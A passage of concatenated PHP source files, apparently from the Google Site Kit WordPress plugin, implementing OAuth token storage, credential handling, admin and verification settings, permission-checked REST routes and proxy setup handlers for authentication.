OAuth_Client::OPTION_ACCESS_TOKEN_EXPIRES_IN ), 'created' => (int) $this->user_options->get( OAuth_Client::OPTION_ACCESS_TOKEN_CREATED ), ); $refresh_token = $this->encrypted_user_options->get( OAuth_Client::OPTION_REFRESH_TOKEN ); if ( ! empty( $refresh_token ) ) { $token['refresh_token'] = $refresh_token; } return $token; } /** * Sets the value of the setting with the given value. * * @since 1.39.0 * * @param mixed $value Setting value. Must be serializable if non-scalar. * * @return bool True on success, false on failure. */ public function set( $value ) { if ( empty( $value['access_token'] ) ) { return false; } // Use reasonable defaults for these fields. if ( empty( $value['expires_in'] ) ) { $value['expires_in'] = HOUR_IN_SECONDS; } if ( empty( $value['created'] ) ) { $value['created'] = time(); } $this->encrypted_user_options->set( OAuth_Client::OPTION_ACCESS_TOKEN, $value['access_token'] ); $this->user_options->set( OAuth_Client::OPTION_ACCESS_TOKEN_EXPIRES_IN, $value['expires_in'] ); $this->user_options->set( OAuth_Client::OPTION_ACCESS_TOKEN_CREATED, $value['created'] ); if ( ! empty( $value['refresh_token'] ) ) { $this->encrypted_user_options->set( OAuth_Client::OPTION_REFRESH_TOKEN, $value['refresh_token'] ); } return true; } /** * Deletes the setting. * * @since 1.39.0 * * @return bool True on success, false on failure. */ public function delete() { $this->user_options->delete( OAuth_Client::OPTION_ACCESS_TOKEN ); $this->user_options->delete( OAuth_Client::OPTION_ACCESS_TOKEN_EXPIRES_IN ); $this->user_options->delete( OAuth_Client::OPTION_ACCESS_TOKEN_CREATED ); $this->user_options->delete( OAuth_Client::OPTION_REFRESH_TOKEN ); return true; } } <?php /** * Class Google\Site_Kit\Core\Authentication\Has_Multiple_Admins * * @package Google\Site_Kit\Core\Authentication * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication; use Google\Site_Kit\Core\Storage\Transients; use Google\Site_Kit\Core\Util\Method_Proxy_Trait; use WP_User; use WP_User_Query; /** * Has_Multiple_Admins class. * * @since 1.29.0 * @access private * @ignore */ class Has_Multiple_Admins { use Method_Proxy_Trait; /** * The option_name for this transient. */ const OPTION = 'googlesitekit_has_multiple_admins'; /** * Transients instance. * * @since 1.29.0 * @var Transients */ protected $transients; /** * Constructor. * * @since 1.29.0 * * @param Transients $transients Transients instance. */ public function __construct( Transients $transients ) { $this->transients = $transients; } /** * Registers functionality through WordPress hooks. * * @since 1.166.0 */ public function register() { add_action( 'deleted_user', $this->get_method_proxy( 'handle_user_deletion' ), 10, 3 ); add_action( 'set_user_role', $this->get_method_proxy( 'handle_set_user_role' ), 10, 3 ); add_action( 'add_user_role', $this->get_method_proxy( 'handle_add_remove_role' ), 10, 2 ); add_action( 'remove_user_role', $this->get_method_proxy( 'handle_add_remove_role' ), 10, 2 ); } /** * Returns a flag indicating whether the current site has multiple users. * * @since 1.29.0 * * @return boolean TRUE if the site kit has multiple admins, otherwise FALSE. */ public function get() { $admins_count = $this->transients->get( self::OPTION ); if ( false === $admins_count ) { $user_query_args = array( 'number' => 1, 'role__in' => array( 'Administrator' ), 'count_total' => true, ); $user_query = new WP_User_Query( $user_query_args ); $admins_count = $user_query->get_total(); $this->transients->set( self::OPTION, $admins_count, WEEK_IN_SECONDS ); } return $admins_count > 1; } /** * Handles user deletion. * * Executed by the `deleted_user` hook. * We skip clearing the transient cache, only if we are sure that the user * being deleted is not an admin. The $user parameter is only available * in WP 5.5+, so we do not rely on it. * * @since 1.166.0 * * @param int $user_id User ID. * @param bool $reassign Whether the user's posts are being reassigned. * @param WP_User $user User object. * @return void */ protected function handle_user_deletion( $user_id, $reassign, $user = null ) { if ( $user instanceof WP_User && ! in_array( 'administrator', $user->roles, true ) ) { return; } $this->transients->delete( self::OPTION ); } /** * Clears transient cache when a user is added or updated * * Executed by the `set_user_role` hook. `WP_User::set_role()` is used when * adding a new user as well as updating an existing user's profile (so we do not * have to specifically hook into `user_register` or `profile_update` hooks). * Furthermore, `WP_User::set_role()` calls `remove_role()` and `add_role()` internally, * but only after WordPress 6.0. So we still have to hook into `set_user_role` to cover * all versions before it. * We skip clearing the transient cache only if we are sure that we aren't * changing a role from or to the 'administrator' role. * * @since 1.166.0 * * @param int $user_id User ID. * @param string $role New role. * @param array $old_roles Old roles. * @return void */ protected function handle_set_user_role( $user_id, $role, $old_roles = array() ) { if ( ! in_array( 'administrator', (array) $old_roles, true ) && 'administrator' !== $role ) { return; } $this->transients->delete( self::OPTION ); } /** * Handles user role changes. * * Executed by the `add_user_role` and `remove_user_role` hooks. These hooks * are called internally by `WP_User::add_role()` and `WP_User::remove_role()` * respectively. From WordPress 6.0, these hooks are always called even * when the more generic `WP_User::set_role()` is used when adding or updating * a user. However, for backwards compatibility with earlier versions, we still * have to clear the cache and hook into `set_user_role` separately. * We skip clearing the transient cache only if we are sure that * the role being added/removed is 'administrator'. * * @since 1.166.0 * * @param int $user_id User ID. * @param string $role Role being added/removed. * @return void */ protected function handle_add_remove_role( $user_id, $role ) { if ( 'administrator' !== $role ) { return; } $this->transients->delete( self::OPTION ); } } <?php /** * Class Google\Site_Kit\Core\Authentication\Verification * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication; use Google\Site_Kit\Core\Storage\User_Setting; /** * Class representing the status of whether a user is verified as an owner of the site. * * @since 1.0.0 * @access private * @ignore */ final class Verification extends User_Setting { /** * User option key. */ const OPTION = 'googlesitekit_site_verified_meta'; /** * Gets the value of the setting. * * @since 1.4.0 * * @return mixed Value set for the option, or default if not set. */ public function get() { return (bool) parent::get(); } /** * Flags the user as verified or unverified. * * @since 1.0.0 * * @param bool $verified Whether to flag the user as verified or unverified. * @return bool True on success, false on failure. */ public function set( $verified ) { if ( ! $verified ) { return $this->delete(); } return parent::set( '1' ); } /** * Gets the expected value type. * * @since 1.4.0 * * @return string The type name. */ protected function get_type() { return 'boolean'; } /** * Gets the default value. * * Returns an empty string by default for consistency with get_user_meta. * * @since 1.4.0 * * @return mixed The default value. */ protected function get_default() { return false; } } <?php /** * Class Google\Site_Kit\Core\Authentication\Disconnected_Reason * * @package Google\Site_Kit\Core\Authentication * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication; use Google\Site_Kit\Core\Storage\User_Setting; /** * Disconnected_Reason class. * * @since 1.17.0 * @access private * @ignore */ class Disconnected_Reason extends User_Setting { /** * The option_name for this setting. */ const OPTION = 'googlesitekit_disconnected_reason'; /** * Available reasons. */ const REASON_CONNECTED_URL_MISMATCH = 'connected_url_mismatch'; /** * Registers the setting in WordPress. * * @since 1.17.0 */ public function register() { parent::register(); add_action( 'googlesitekit_authorize_user', array( $this, 'delete' ) ); } } <?php /** * Class Google\Site_Kit\Core\Authentication\Verification_Meta * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication; use Google\Site_Kit\Core\Storage\User_Setting; /** * Class representing the site verification meta tag for a user. * * @since 1.1.0 * @access private * @ignore */ final class Verification_Meta extends User_Setting { /** * User option key. */ const OPTION = 'googlesitekit_site_verification_meta'; } <?php /** * Class Google\Site_Kit\Core\Authentication\Has_Connected_Admins * * @package Google\Site_Kit\Core\Authentication * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication; use Google\Site_Kit\Core\Authentication\Clients\OAuth_Client; use Google\Site_Kit\Core\Storage\Options_Interface; use Google\Site_Kit\Core\Storage\Setting; use Google\Site_Kit\Core\Storage\User_Options_Interface; use WP_User; /** * Has_Connected_Admins class. * * @since 1.14.0 * @access private * @ignore */ class Has_Connected_Admins extends Setting { /** * The option_name for this setting. */ const OPTION = 'googlesitekit_has_connected_admins'; /** * User options instance implementing User_Options_Interface. * * @since 1.14.0 * @var User_Options_Interface */ protected $user_options; /** * Constructor. * * @since 1.14.0 * * @param Options_Interface $options Options instance. * @param User_Options_Interface $user_options User options instance. */ public function __construct( Options_Interface $options, User_Options_Interface $user_options ) { parent::__construct( $options ); $this->user_options = $user_options; } /** * Registers the setting in WordPress. * * @since 1.14.0 */ public function register() { parent::register(); $access_token_meta_key = $this->user_options->get_meta_key( OAuth_Client::OPTION_ACCESS_TOKEN ); add_action( 'added_user_meta', function ( $mid, $uid, $meta_key ) use ( $access_token_meta_key ) { // phpcs:ignore WordPress.WP.Capabilities.RoleFound if ( $meta_key === $access_token_meta_key && user_can( $uid, 'administrator' ) ) { $this->set( true ); } }, 10, 3 ); add_action( 'deleted_user_meta', function ( $mid, $uid, $meta_key ) use ( $access_token_meta_key ) { if ( $meta_key === $access_token_meta_key ) { $this->delete(); } }, 10, 3 ); } /** * Gets the value of the setting. If the option is not set yet, it pulls connected * admins from the database and sets the option. * * @since 1.14.0 * * @return boolean TRUE if the site kit already has connected admins, otherwise FALSE. */ public function get() { // If the option doesn't exist, query the fresh value, set it and return it. if ( ! $this->has() ) { $users = $this->query_connected_admins(); $has_connected_admins = count( $users ) > 0; $this->set( (int) $has_connected_admins ); return $has_connected_admins; } return (bool) parent::get(); } /** * Queries connected admins and returns an array of connected admin IDs. * * @since 1.14.0 * * @return array The array of connected admin IDs. */ protected function query_connected_admins() { return get_users( array( 'meta_key' => $this->user_options->get_meta_key( OAuth_Client::OPTION_ACCESS_TOKEN ), // phpcs:ignore WordPress.DB.SlowDBQuery.slow_db_query_meta_key 'meta_compare' => 'EXISTS', 'role' => 'administrator', 'number' => 1, 'fields' => 'ID', ) ); } /** * Gets the expected value type. * * @since 1.14.0 * * @return string The type name. */ protected function get_type() { return 'boolean'; } } <?php /** * Class Google\Site_Kit\Core\Authentication\Profile * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication; use Google\Site_Kit\Core\Storage\User_Options; /** * Class controlling the user's Google profile. * * @since 0.1.0 */ final class Profile { /** * Option key in options table. */ const OPTION = 'googlesitekit_profile'; /** * User_Options instance. * * @since 1.0.0 * @var User_Options */ private $user_options; /** * Constructor. * * @since 1.0.0 * * @param User_Options $user_options User_Options instance. */ public function __construct( User_Options $user_options ) { $this->user_options = $user_options; } /** * Retrieves user profile data. * * @since 1.0.0 * * @return array|bool Value set for the profile, or false if not set. */ public function get() { return $this->user_options->get( self::OPTION ); } /** * Saves user profile data. * * @since 1.0.0 * * @param array $data User profile data: email and photo. * @return bool True on success, false on failure. */ public function set( $data ) { return $this->user_options->set( self::OPTION, $data ); } /** * Verifies if user has their profile information stored. * * @since 1.0.0 * * @return bool True if profile is set, false otherwise. */ public function has() { $profile = (array) $this->get(); if ( ! empty( $profile['email'] ) && ! empty( $profile['photo'] ) ) { return true; } return false; } } <?php /** * Class Google\Site_Kit\Core\Authentication\Credentials * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication; use Google\Site_Kit\Core\Storage\Setting; /** * Class representing the OAuth client ID and secret credentials. * * @since 1.0.0 * @access private * @ignore */ final class Credentials extends Setting { /** * Option key in options table. */ const OPTION = 'googlesitekit_credentials'; /** * Retrieves Site Kit credentials. * * @since 1.0.0 * * @return array|bool Value set for the credentials, or false if not set. */ public function get() { /** * Site Kit oAuth Secret is a JSON string of the Google Cloud Platform web application used for Site Kit * that will be associated with this account. This is meant to be a temporary way to specify the client secret * until the authentication proxy has been completed. This filter can be specified from a separate theme or plugin. * * To retrieve the JSON secret, use the following instructions: * - Go to the Google Cloud Platform and create a new project or use an existing one * - In the APIs & Services section, enable the APIs that are used within Site Kit * - Under 'credentials' either create new oAuth Client ID credentials or use an existing set of credentials * - Set the authorizes redirect URIs to be the URL to the oAuth callback for Site Kit, eg. https://<domainname>?oauth2callback=1 (this must be public) * - Click the 'Download JSON' button to download the JSON file that can be copied and pasted into the filter */ $credentials = apply_filters( 'googlesitekit_oauth_secret', '' ); if ( is_string( $credentials ) && trim( $credentials ) ) { $credentials = json_decode( $credentials, true ); } if ( isset( $credentials['web']['client_id'], $credentials['web']['client_secret'] ) ) { return $this->parse_defaults( array( 'oauth2_client_id' => $credentials['web']['client_id'], 'oauth2_client_secret' => $credentials['web']['client_secret'], ) ); } return $this->parse_defaults( $this->options->get( self::OPTION ) ); } /** * Checks whether Site Kit has been setup with client ID and secret. * * @since 1.0.0 * * @return bool True if credentials are set, false otherwise. */ public function has() { $credentials = (array) $this->get(); if ( ! empty( $credentials ) && ! empty( $credentials['oauth2_client_id'] ) && ! empty( $credentials['oauth2_client_secret'] ) ) { return true; } return false; } /** * Parses Credentials data and merges with its defaults. * * @since 1.0.0 * * @param mixed $data Credentials data. * @return array Parsed $data. */ private function parse_defaults( $data ) { $defaults = $this->get_default(); if ( ! is_array( $data ) ) { return $defaults; } return wp_parse_args( $data, $defaults ); } /** * Gets the default value. * * @since 1.2.0 * * @return array */ protected function get_default() { return array( 'oauth2_client_id' => '', 'oauth2_client_secret' => '', ); } /** * Determines whether the authentication proxy is used. * * In order to streamline the setup and authentication flow, the plugin uses a proxy mechanism based on an external * service. This can be overridden by providing actual GCP credentials with the {@see 'googlesitekit_oauth_secret'} * filter. * * @since 1.9.0 * * @return bool True if proxy authentication is used, false otherwise. */ public function using_proxy() { $creds = $this->get(); if ( ! $this->has() ) { return true; } return (bool) preg_match( '/\.apps\.sitekit\.withgoogle\.com$/', $creds['oauth2_client_id'] ); } } <?php /** * Class Google\Site_Kit\Core\Authentication\REST_Authentication_Controller * * @package Google\Site_Kit * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\REST_API\REST_Route; use Google\Site_Kit\Core\REST_API\REST_Routes; use WP_REST_Server; use WP_REST_Request; use WP_REST_Response; /** * REST Authentication Controller Class. * * @since 1.131.0 * @access private * @ignore */ final class REST_Authentication_Controller { /** * Authentication instance. * * @since 1.131.0 * @var Authentication */ protected $authentication; /** * Constructor. * * @since 1.131.0 * * @param Authentication $authentication Authentication instance. */ public function __construct( Authentication $authentication ) { $this->authentication = $authentication; } /** * Registers functionality through WordPress hooks. * * @since 1.131.0 */ public function register() { add_filter( 'googlesitekit_rest_routes', function ( $routes ) { return array_merge( $routes, $this->get_rest_routes() ); } ); add_filter( 'googlesitekit_apifetch_preload_paths', function ( $routes ) { $authentication_routes = array( '/' . REST_Routes::REST_ROOT . '/core/site/data/connection', '/' . REST_Routes::REST_ROOT . '/core/user/data/authentication', ); return array_merge( $routes, $authentication_routes ); } ); } /** * Gets related REST routes. * * @since 1.3.0 * @since 1.131.0 Moved to REST_Authentication_Controller class. * * @return array List of REST_Route objects. */ private function get_rest_routes() { $can_setup = function () { return current_user_can( Permissions::SETUP ); }; $can_access_authentication = function () { return current_user_can( Permissions::VIEW_SPLASH ) || current_user_can( Permissions::VIEW_DASHBOARD ); }; $can_disconnect = function () { return current_user_can( Permissions::AUTHENTICATE ); }; $can_view_authenticated_dashboard = function () { return current_user_can( Permissions::VIEW_AUTHENTICATED_DASHBOARD ); }; return array( new REST_Route( 'core/site/data/connection', array( array( 'methods' => WP_REST_Server::READABLE, 'callback' => function () { $data = array( 'connected' => $this->authentication->credentials()->has(), 'resettable' => $this->authentication->get_options_instance()->has( Credentials::OPTION ), 'setupCompleted' => $this->authentication->is_setup_completed(), 'hasConnectedAdmins' => $this->authentication->get_has_connected_admins_instance()->get(), 'hasMultipleAdmins' => $this->authentication->get_has_multiple_admins_instance()->get(), 'ownerID' => $this->authentication->get_owner_id_instance()->get(), ); return new WP_REST_Response( $data ); }, 'permission_callback' => $can_setup, ), ) ), new REST_Route( 'core/user/data/authentication', array( array( 'methods' => WP_REST_Server::READABLE, 'callback' => function () { $oauth_client = $this->authentication->get_oauth_client(); $is_authenticated = $this->authentication->is_authenticated(); $data = array( 'authenticated' => $is_authenticated, 'requiredScopes' => $oauth_client->get_required_scopes(), 'grantedScopes' => $is_authenticated ? $oauth_client->get_granted_scopes() : array(), 'unsatisfiedScopes' => $is_authenticated ? $oauth_client->get_unsatisfied_scopes() : array(), 'needsReauthentication' => $oauth_client->needs_reauthentication(), 'disconnectedReason' => $this->authentication->get_disconnected_reason_instance()->get(), 'connectedProxyURL' => $this->authentication->get_connected_proxy_url_instance()->get(), ); return new WP_REST_Response( $data ); }, 'permission_callback' => $can_access_authentication, ), ) ), new REST_Route( 'core/user/data/disconnect', array( array( 'methods' => WP_REST_Server::EDITABLE, 'callback' => function () { $this->authentication->disconnect(); return new WP_REST_Response( true ); }, 'permission_callback' => $can_disconnect, ), ) ), new REST_Route( 'core/user/data/get-token', array( array( 'methods' => WP_REST_Server::CREATABLE, 'callback' => function () { $this->authentication->do_refresh_user_token(); return new WP_REST_Response( array( 'token' => $this->authentication->get_oauth_client()->get_access_token(), ) ); }, 'permission_callback' => $can_view_authenticated_dashboard, ), ) ), ); } } <?php /** * Class Google\Site_Kit\Core\Authentication\Initial_Version * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication; use Google\Site_Kit\Core\Storage\User_Setting; /** * Class representing the initial Site Kit version the user started with. * * @since 1.25.0 * @access private * @ignore */ final class Initial_Version extends User_Setting { /** * User option key. */ const OPTION = 'googlesitekitpersistent_initial_version'; } <?php /** * Class Google\Site_Kit\Core\Authentication\Setup * * @package Google\Site_Kit\Core\Authentication * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Authentication\Clients\OAuth_Client; use Google\Site_Kit\Core\Authentication\Exception\Exchange_Site_Code_Exception; use Google\Site_Kit\Core\Authentication\Exception\Missing_Verification_Exception; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\Storage\User_Options; use Google\Site_Kit\Core\Util\Remote_Features; /** * Base class for authentication setup. * * @since 1.48.0 * @access private * @ignore */ class Setup { /** * Context instance. * * @since 1.48.0 * * @var Context */ protected $context; /** * User_Options instance. * * @since 1.48.0 * * @var User_Options */ protected $user_options; /** * Authentication instance. * * @since 1.48.0 * * @var Authentication */ protected $authentication; /** * Google_Proxy instance. * * @since 1.48.0 * * @var Google_Proxy */ protected $google_proxy; /** * Proxy support URL. * * @since 1.109.0 Explicitly declared; previously, it was dynamically declared. * * @var string */ protected $proxy_support_link_url; /** * Credentials instance. * * @since 1.48.0 * * @var Credentials */ protected $credentials; /** * Constructor. * * @since 1.48.0 * * @param Context $context Context instance. * @param User_Options $user_options User_Options instance. * @param Authentication $authentication Authentication instance. */ public function __construct( Context $context, User_Options $user_options, Authentication $authentication ) { $this->context = $context; $this->user_options = $user_options; $this->authentication = $authentication; $this->credentials = $authentication->credentials(); $this->google_proxy = $authentication->get_google_proxy(); $this->proxy_support_link_url = $authentication->get_proxy_support_link_url(); } /** * Registers functionality through WordPress hooks. * * @since 1.48.0 */ public function register() { add_action( 'admin_action_' . Google_Proxy::ACTION_SETUP_START, array( $this, 'handle_action_setup_start' ) ); add_action( 'admin_action_' . Google_Proxy::ACTION_VERIFY, array( $this, 'handle_action_verify' ) ); add_action( 'admin_action_' . Google_Proxy::ACTION_EXCHANGE_SITE_CODE, array( $this, 'handle_action_exchange_site_code' ) ); } /** * Composes the oAuth proxy get help link. * * @since 1.81.0 * @since 1.167.0 Added support for custom error codes. * * @param string|null $error_code The error code. Optional. Defaults to null. * @return string The get help link. */ private function get_oauth_proxy_failed_help_link( $error_code = null ) { // Map `request_failed` to the error ID `request_to_auth_proxy_failed` for backwards compatibility. if ( null === $error_code || 'request_failed' === $error_code ) { $error_id = 'request_to_auth_proxy_failed'; } else { $error_id = $error_code; } return sprintf( /* translators: 1: Support link URL. 2: Get help string. */ __( '<a href="%1$s" target="_blank">%2$s</a>', 'google-site-kit' ), esc_url( add_query_arg( 'error_id', $error_id, $this->proxy_support_link_url ) ), esc_html__( 'Get help', 'google-site-kit' ) ); } /** * Handles the setup start action, taking the user to the proxy setup screen. * * @since 1.48.0 */ public function handle_action_setup_start() { $nonce = htmlspecialchars( $this->context->input()->filter( INPUT_GET, 'nonce' ) ?? '' ); $redirect_url = $this->context->input()->filter( INPUT_GET, 'redirect', FILTER_DEFAULT ); $this->verify_nonce( $nonce, Google_Proxy::ACTION_SETUP_START ); if ( ! current_user_can( Permissions::SETUP ) ) { wp_die( esc_html__( 'You have insufficient permissions to connect Site Kit.', 'google-site-kit' ) ); } if ( ! $this->credentials->using_proxy() ) { wp_die( esc_html__( 'Site Kit is not configured to use the authentication proxy.', 'google-site-kit' ) ); } $required_scopes = $this->authentication->get_oauth_client()->get_required_scopes(); $this->google_proxy->with_scopes( $required_scopes ); $oauth_setup_redirect = $this->credentials->has() ? $this->google_proxy->sync_site_fields( $this->credentials, 'sync' ) : $this->google_proxy->register_site( 'sync' ); if ( is_wp_error( $oauth_setup_redirect ) ) { $error_message = $oauth_setup_redirect->get_error_message(); if ( empty( $error_message ) ) { $error_message = $oauth_setup_redirect->get_error_code(); } wp_die( sprintf( /* translators: 1: Error message or error code. 2: Get help link. */ esc_html__( 'The request to the authentication proxy has failed with an error: %1$s %2$s.', 'google-site-kit' ), esc_html( $error_message ), wp_kses( $this->get_oauth_proxy_failed_help_link( $oauth_setup_redirect->get_error_code() ), array( 'a' => array( 'href' => array(), 'target' => array(), ), ) ) ) ); } if ( ! filter_var( $oauth_setup_redirect, FILTER_VALIDATE_URL ) ) { wp_die( sprintf( /* translators: %s: Get help link. */ esc_html__( 'The request to the authentication proxy has failed. Please, try again later. %s.', 'google-site-kit' ), wp_kses( $this->get_oauth_proxy_failed_help_link(), array( 'a' => array( 'href' => array(), 'target' => array(), ), ) ) ) ); } if ( $redirect_url ) { $this->user_options->set( OAuth_Client::OPTION_REDIRECT_URL, $redirect_url ); } wp_safe_redirect( $oauth_setup_redirect ); exit; } /** * Handles the action for verifying site ownership. * * @since 1.48.0 * @since 1.49.0 Sets the `verify` and `verification_method` and `site_id` query params. */ public function handle_action_verify() { $input = $this->context->input(); $step = htmlspecialchars( $input->filter( INPUT_GET, 'step' ) ?? '' ); $nonce = htmlspecialchars( $input->filter( INPUT_GET, 'nonce' ) ?? '' ); $code = htmlspecialchars( $input->filter( INPUT_GET, 'googlesitekit_code' ) ?? '' ); $site_code = htmlspecialchars( $input->filter( INPUT_GET, 'googlesitekit_site_code' ) ?? '' ); $verification_token = htmlspecialchars( $input->filter( INPUT_GET, 'googlesitekit_verification_token' ) ?? '' ); $verification_method = htmlspecialchars( $input->filter( INPUT_GET, 'googlesitekit_verification_token_type' ) ?? '' ); $this->verify_nonce( $nonce ); if ( ! current_user_can( Permissions::SETUP ) ) { wp_die( esc_html__( 'You don’t have permissions to set up Site Kit.', 'google-site-kit' ), 403 ); } if ( ! $code ) { wp_die( esc_html__( 'Invalid request.', 'google-site-kit' ), 400 ); } if ( ! $verification_token || ! $verification_method ) { wp_die( esc_html__( 'Verifying site ownership requires a token and verification method.', 'google-site-kit' ), 400 ); } $this->handle_verification( $verification_token, $verification_method ); $proxy_query_params = array( 'step' => $step, 'verify' => 'true', 'verification_method' => $verification_method, ); // If the site does not have a site ID yet, a site code will be passed. // Handling the site code here will save the extra redirect from the proxy if successful. if ( $site_code ) { try { $this->handle_site_code( $code, $site_code ); } catch ( Missing_Verification_Exception $exception ) { $proxy_query_params['site_code'] = $site_code; $this->redirect_to_proxy( $code, $proxy_query_params ); } catch ( Exchange_Site_Code_Exception $exception ) { $this->redirect_to_splash(); } } $credentials = $this->credentials->get(); $proxy_query_params['site_id'] = ! empty( $credentials['oauth2_client_id'] ) ? $credentials['oauth2_client_id'] : ''; $this->redirect_to_proxy( $code, $proxy_query_params ); } /** * Handles the action for exchanging the site code for site credentials. * * This action will only be called if the site code failed to be handled * during the verification step. * * @since 1.48.0 */ public function handle_action_exchange_site_code() { $input = $this->context->input(); $step = htmlspecialchars( $input->filter( INPUT_GET, 'step' ) ?? '' ); $nonce = htmlspecialchars( $input->filter( INPUT_GET, 'nonce' ) ?? '' ); $code = htmlspecialchars( $input->filter( INPUT_GET, 'googlesitekit_code' ) ?? '' ); $site_code = htmlspecialchars( $input->filter( INPUT_GET, 'googlesitekit_site_code' ) ?? '' ); $this->verify_nonce( $nonce ); if ( ! current_user_can( Permissions::SETUP ) ) { wp_die( esc_html__( 'You don’t have permissions to set up Site Kit.', 'google-site-kit' ), 403 ); } if ( ! $code || ! $site_code ) { wp_die( esc_html__( 'Invalid request.', 'google-site-kit' ), 400 ); } try { $this->handle_site_code( $code, $site_code ); } catch ( Missing_Verification_Exception $exception ) { $this->redirect_to_proxy( $code, compact( 'site_code', 'step' ) ); } catch ( Exchange_Site_Code_Exception $exception ) { $this->redirect_to_splash(); } $credentials = $this->credentials->get(); $site_id = ! empty( $credentials['oauth2_client_id'] ) ? $credentials['oauth2_client_id'] : ''; $this->redirect_to_proxy( $code, compact( 'site_id', 'step' ) ); } /** * Verifies the given nonce for a setup action. * * The nonce passed from the proxy will always be the one initially provided to it. * {@see Google_Proxy::setup_url()} * * @since 1.48.0 * * @param string $nonce Action nonce. * @param string $action Action name. Optional. Defaults to the action for the nonce given to the proxy. */ protected function verify_nonce( $nonce, $action = Google_Proxy::NONCE_ACTION ) { if ( ! wp_verify_nonce( $nonce, $action ) ) { $this->authentication->invalid_nonce_error( $action ); } } /** * Handles site verification. * * @since 1.48.0 * * @param string $token Verification token. * @param string $method Verification method. */ protected function handle_verification( $token, $method ) { /** * Verifies site ownership using the given token and verification method. * * @since 1.48.0 * * @param string $token Verification token. * @param string $method Verification method. */ do_action( 'googlesitekit_verify_site_ownership', $token, $method ); } /** * Handles the exchange of a code and site code for client credentials from the proxy. * * @since 1.48.0 * * @param string $code Code ('googlesitekit_code') provided by proxy. * @param string $site_code Site code ('googlesitekit_site_code') provided by proxy. * * @throws Missing_Verification_Exception Thrown if exchanging the site code fails due to missing site verification. * @throws Exchange_Site_Code_Exception Thrown if exchanging the site code fails for any other reason. */ protected function handle_site_code( $code, $site_code ) { $data = $this->google_proxy->exchange_site_code( $site_code, $code ); if ( is_wp_error( $data ) ) { $error_code = $data->get_error_message() ?: $data->get_error_code(); $error_code = $error_code ?: 'unknown_error'; if ( 'missing_verification' === $error_code ) { throw new Missing_Verification_Exception(); } $this->user_options->set( OAuth_Client::OPTION_ERROR_CODE, $error_code ); throw new Exchange_Site_Code_Exception( $error_code ); } $this->credentials->set( array( 'oauth2_client_id' => $data['site_id'], 'oauth2_client_secret' => $data['site_secret'], ) ); } /** * Redirects back to the authentication service with any added parameters. * * For v2 of the proxy, this method now has to ensure that the user is redirected back to the correct step on the * proxy, based on which action was received. * * @since 1.48.0 * @since 1.49.0 Uses the new `Google_Proxy::setup_url_v2` method when the `serviceSetupV2` feature flag is enabled. * * @param string $code Code ('googlesitekit_code') provided by proxy. * @param array $params Additional query parameters to include in the proxy redirect URL. */ protected function redirect_to_proxy( $code = '', $params = array() ) { $params['code'] = $code; $url = $this->authentication->get_google_proxy()->setup_url( $params ); wp_safe_redirect( $url ); exit; } /** * Redirects to the Site Kit splash page. * * @since 1.48.0 */ protected function redirect_to_splash() { wp_safe_redirect( $this->context->admin_url( 'splash' ) ); exit; } } <?php /** * Class Google\Site_Kit\Core\Authentication\Guards\Site_Connected_Guard * * @package Google\Site_Kit * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication\Guards; use Google\Site_Kit\Core\Authentication\Credentials; use Google\Site_Kit\Core\Guards\Guard_Interface; /** * Class providing guard logic for site connection. * * @since 1.133.0 * @access private * @ignore */ class Site_Connected_Guard implements Guard_Interface { /** * Credentials instance. * * @var Credentials */ private Credentials $credentials; /** * Constructor. * * @since 1.133.0 * @param Credentials $credentials Credentials instance. */ public function __construct( Credentials $credentials ) { $this->credentials = $credentials; } /** * Determines whether the guarded entity can be activated or not. * * @since 1.133.0 * @return bool|\WP_Error */ public function can_activate() { return $this->credentials->has(); } } <?php /** * Class Google\Site_Kit\Core\Authentication\Guards\Using_Proxy_Connection_Guard * * @package Google\Site_Kit * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication\Guards; use Google\Site_Kit\Core\Authentication\Credentials; use Google\Site_Kit\Core\Guards\Guard_Interface; /** * Class providing guard logic based on proxy connection. * * @since 1.133.0 * @access private * @ignore */ class Using_Proxy_Connection_Guard implements Guard_Interface { /** * Credentials instance. * * @var Credentials */ private Credentials $credentials; /** * Constructor. * * @since 1.133.0 * @param Credentials $credentials Credentials instance. */ public function __construct( Credentials $credentials ) { $this->credentials = $credentials; } /** * Determines whether the guarded entity can be activated or not. * * @since 1.133.0 * @return bool|\WP_Error */ public function can_activate() { return $this->credentials->using_proxy(); } } <?php /** * Class 